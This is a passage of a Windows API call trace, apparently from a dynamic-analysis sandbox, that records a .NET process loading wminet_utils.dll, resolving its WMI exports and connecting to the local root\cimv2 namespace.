ppvObject=0x8f1eebc | out: ppvObject=0x8f1eebc*=0x8800b30) returned 0x0 [0037.370] WbemLocator:IUnknown:QueryInterface (in: This=0x8800b30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f1ee78 | out: ppvObject=0x8f1ee78*=0x0) returned 0x80004002 [0037.370] WbemLocator:IUnknown:AddRef (This=0x8800b30) returned 0x3 [0037.370] WbemLocator:IUnknown:QueryInterface (in: This=0x8800b30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f1e7d4 | out: ppvObject=0x8f1e7d4*=0x0) returned 0x80004002 [0037.370] WbemLocator:IUnknown:QueryInterface (in: This=0x8800b30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f1e784 | out: ppvObject=0x8f1e784*=0x0) returned 0x80004002 [0037.370] WbemLocator:IUnknown:QueryInterface (in: This=0x8800b30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f1e790 | out: ppvObject=0x8f1e790*=0x0) returned 0x80004002 [0037.370] CoGetContextToken (in: pToken=0x8f1e7f0 | out: pToken=0x8f1e7f0) returned 0x0 [0037.371] CoGetObjectContext (in: riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7d8a9c | out: ppv=0x7d8a9c*=0x78c4f0) returned 0x0 [0037.371] CoGetContextToken (in: pToken=0x8f1ebf8 | out: pToken=0x8f1ebf8) returned 0x0 [0037.371] WbemLocator:IUnknown:QueryInterface (in: This=0x8800b30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f1ec88 | out: ppvObject=0x8f1ec88*=0x0) returned 0x80004002 [0037.372] WbemLocator:IUnknown:Release (This=0x8800b30) returned 0x2 [0037.372] WbemLocator:IUnknown:Release (This=0x8800b30) returned 0x1 [0037.372] CoGetContextToken (in: pToken=0x8f1f268 | out: pToken=0x8f1f268) returned 0x0 [0037.372] CoGetContextToken (in: pToken=0x8f1f1c8 | out: pToken=0x8f1f1c8) returned 0x0 [0037.372] WbemLocator:IUnknown:QueryInterface (in: This=0x8800b30, riid=0x8f1f298*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f1f294 | out: ppvObject=0x8f1f294*=0x8800b30) returned 0x0 [0037.372] WbemLocator:IUnknown:AddRef (This=0x8800b30) returned 0x3 [0037.372] WbemLocator:IUnknown:Release (This=0x8800b30) returned 0x2 [0037.376] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x8800998, puCount=0x8f1f42c | out: puCount=0x8f1f42c*=0x2) returned 0x0 [0037.376] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=8, puBuffLength=0x8f1f428*=0x0, pszText=0x0 | out: puBuffLength=0x8f1f428*=0xf, pszText=0x0) returned 0x0 [0037.376] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=8, puBuffLength=0x8f1f428*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f1f428*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0037.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x8f1e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0037.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x8f1ebb0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", lpUsedDefaultChar=0x0) returned 63 [0037.381] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x741f0000 [0037.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x8f1ebe4, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1a\x1dq·?¶\x82\x94 t¨îñ\x08àè}", lpUsedDefaultChar=0x0) returned 13 [0037.461] GetProcAddress (hModule=0x741f0000, lpProcName="ResetSecurity") returned 0x741f24de [0037.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x8f1ebe4, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0037.468] GetProcAddress (hModule=0x741f0000, lpProcName="SetSecurity") returned 0x741f2520 [0037.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x8f1ebe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 18 [0037.475] GetProcAddress (hModule=0x741f0000, lpProcName="BlessIWbemServices") returned 0x741f1c69 [0037.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x8f1ebd8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 24 [0037.502] GetProcAddress (hModule=0x741f0000, lpProcName="BlessIWbemServicesObject") returned 0x741f1cbb [0037.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x8f1ebe0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 17 [0037.522] GetProcAddress (hModule=0x741f0000, lpProcName="GetPropertyHandle") returned 0x741f21b4 [0037.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x8f1ebe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 18 [0037.532] GetProcAddress (hModule=0x741f0000, lpProcName="WritePropertyValue") returned 0x741f2617 [0037.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x8f1ebec, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 5 [0037.541] GetProcAddress (hModule=0x741f0000, lpProcName="Clone") returned 0x741f1d0d [0037.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x8f1ebe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0037.549] GetProcAddress (hModule=0x741f0000, lpProcName="VerifyClientKey") returned 0x741f25b4 [0037.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x8f1ebe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0037.553] GetProcAddress (hModule=0x741f0000, lpProcName="GetQualifierSet") returned 0x741f2215 [0037.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x8f1ebec, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0037.554] GetProcAddress (hModule=0x741f0000, lpProcName="Get") returned 0x741f20d4 [0037.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x8f1ebec, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0037.708] GetProcAddress (hModule=0x741f0000, lpProcName="Put") returned 0x741f22be [0037.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x8f1ebec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 6 [0037.721] GetProcAddress (hModule=0x741f0000, lpProcName="Delete") returned 0x741f1f31 [0037.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x8f1ebe8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNamesD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 8 [0037.729] GetProcAddress (hModule=0x741f0000, lpProcName="GetNames") returned 0x741f2182 [0037.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x8f1ebe0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumerationD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 16 [0037.750] GetProcAddress (hModule=0x741f0000, lpProcName="BeginEnumeration") returned 0x741f1c43 [0037.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x8f1ebec, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 4 [0037.757] GetProcAddress (hModule=0x741f0000, lpProcName="Next") returned 0x741f2283 [0037.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x8f1ebe4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 14 [0037.769] GetProcAddress (hModule=0x741f0000, lpProcName="EndEnumeration") returned 0x741f1fc2 [0037.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x8f1ebd8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0037.775] GetProcAddress (hModule=0x741f0000, lpProcName="GetPropertyQualifierSet") returned 0x741f21ff [0037.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x8f1ebec, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 5 [0037.784] GetProcAddress (hModule=0x741f0000, lpProcName="Clone") returned 0x741f1d0d [0037.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x8f1ebe4, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 13 [0037.785] GetProcAddress (hModule=0x741f0000, lpProcName="GetObjectText") returned 0x741f219e [0037.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x8f1ebe0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 17 [0037.794] GetProcAddress (hModule=0x741f0000, lpProcName="SpawnDerivedClass") returned 0x741f2566 [0037.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x8f1ebe4, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 13 [0037.802] GetProcAddress (hModule=0x741f0000, lpProcName="SpawnInstance") returned 0x741f257c [0037.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x8f1ebe8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTo\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 9 [0037.803] GetProcAddress (hModule=0x741f0000, lpProcName="CompareTo") returned 0x741f1d8d [0037.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x8f1ebe0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 17 [0037.810] GetProcAddress (hModule=0x741f0000, lpProcName="GetPropertyOrigin") returned 0x741f21e9 [0037.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x8f1ebe4, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFromD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 12 [0037.821] GetProcAddress (hModule=0x741f0000, lpProcName="InheritsFrom") returned 0x741f2228 [0037.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x8f1ebe8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethod\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 9 [0037.822] GetProcAddress (hModule=0x741f0000, lpProcName="GetMethod") returned 0x741f213a [0037.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x8f1ebe8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethod\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 9 [0037.833] GetProcAddress (hModule=0x741f0000, lpProcName="PutMethod") returned 0x741f23da [0037.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x8f1ebe4, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethodD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 12 [0037.844] GetProcAddress (hModule=0x741f0000, lpProcName="DeleteMethod") returned 0x741f1f44 [0037.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x8f1ebdc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumeration\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 22 [0037.845] GetProcAddress (hModule=0x741f0000, lpProcName="BeginMethodEnumeration") returned 0x741f1c56 [0037.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x8f1ebe8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethod\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 10 [0037.846] GetProcAddress (hModule=0x741f0000, lpProcName="NextMethod") returned 0x741f22a2 [0037.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x8f1ebdc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumerationD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 20 [0037.856] GetProcAddress (hModule=0x741f0000, lpProcName="EndMethodEnumeration") returned 0x741f1fd2 [0037.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x8f1ebdc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSet\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 21 [0037.858] GetProcAddress (hModule=0x741f0000, lpProcName="GetMethodQualifierSet") returned 0x741f216c [0037.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x8f1ebe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin", lpUsedDefaultChar=0x0) returned 15 [0037.859] GetProcAddress (hModule=0x741f0000, lpProcName="GetMethodOrigin") returned 0x741f2156 [0037.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x8f1ebe0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 16 [0037.860] GetProcAddress (hModule=0x741f0000, lpProcName="QualifierSet_Get") returned 0x741f242c [0037.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x8f1ebe0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_PutD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 16 [0037.873] GetProcAddress (hModule=0x741f0000, lpProcName="QualifierSet_Put") returned 0x741f247a [0037.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x8f1ebdc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete", lpUsedDefaultChar=0x0) returned 19 [0037.886] GetProcAddress (hModule=0x741f0000, lpProcName="QualifierSet_Delete") returned 0x741f2409 [0037.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x8f1ebdc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetNames\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 21 [0037.887] GetProcAddress (hModule=0x741f0000, lpProcName="QualifierSet_GetNames") returned 0x741f2448 [0037.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x8f1ebd4, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumeration\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 29 [0037.899] GetProcAddress (hModule=0x741f0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x741f23f6 [0037.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x8f1ebe0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Next\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 17 [0037.900] GetProcAddress (hModule=0x741f0000, lpProcName="QualifierSet_Next") returned 0x741f245e [0037.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x8f1ebd4, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration", lpUsedDefaultChar=0x0) returned 27 [0037.925] GetProcAddress (hModule=0x741f0000, lpProcName="QualifierSet_EndEnumeration") returned 0x741f241c [0037.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x8f1ebd8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType", lpUsedDefaultChar=0x0) returned 23 [0037.926] GetProcAddress (hModule=0x741f0000, lpProcName="GetCurrentApartmentType") returned 0x741f2215 [0037.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x8f1ebdc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStubD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 20 [0037.934] GetProcAddress (hModule=0x741f0000, lpProcName="GetDemultiplexedStub") returned 0x741f20f3 [0037.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x8f1ebdc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmi\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 21 [0037.945] GetProcAddress (hModule=0x741f0000, lpProcName="CreateInstanceEnumWmi") returned 0x741f1ebb [0037.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x8f1ebe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmi\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 18 [0037.968] GetProcAddress (hModule=0x741f0000, lpProcName="CreateClassEnumWmi") returned 0x741f1e45 [0037.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x8f1ebe4, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmiD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 12 [0037.969] GetProcAddress (hModule=0x741f0000, lpProcName="ExecQueryWmi") returned 0x741f205b [0037.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x8f1ebd8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmiD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 24 [0037.994] GetProcAddress (hModule=0x741f0000, lpProcName="ExecNotificationQueryWmi") returned 0x741f1fe2 [0037.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x8f1ebe4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWmi\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 14 [0037.995] GetProcAddress (hModule=0x741f0000, lpProcName="PutInstanceWmi") returned 0x741f235a [0038.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x8f1ebe4, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi", lpUsedDefaultChar=0x0) returned 11 [0038.017] GetProcAddress (hModule=0x741f0000, lpProcName="PutClassWmi") returned 0x741f22da [0038.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x8f1ebd8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObjectD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 24 [0038.018] GetProcAddress (hModule=0x741f0000, lpProcName="CloneEnumWbemClassObject") returned 0x741f1d20 [0038.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x8f1ebe0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmiD\x1a\x1dq·?¶\x82\x94 t¨îñ\x08", lpUsedDefaultChar=0x0) returned 16 [0038.041] GetProcAddress (hModule=0x741f0000, lpProcName="ConnectServerWmi") returned 0x741f1da3 [0038.060] CoCreateInstance (in: rclsid=0x741f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x741f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f1f304 | out: ppv=0x8f1f304*=0x8800b40) returned 0x0 [0038.060] WbemLocator:IWbemLocator:ConnectServer (in: This=0x8800b40, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f1f398 | out: ppNamespace=0x8f1f398*=0x880d334) returned 0x0 [0042.086] WbemLocator:IUnknown:QueryInterface (in: This=0x880d334, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f1f234 | out: 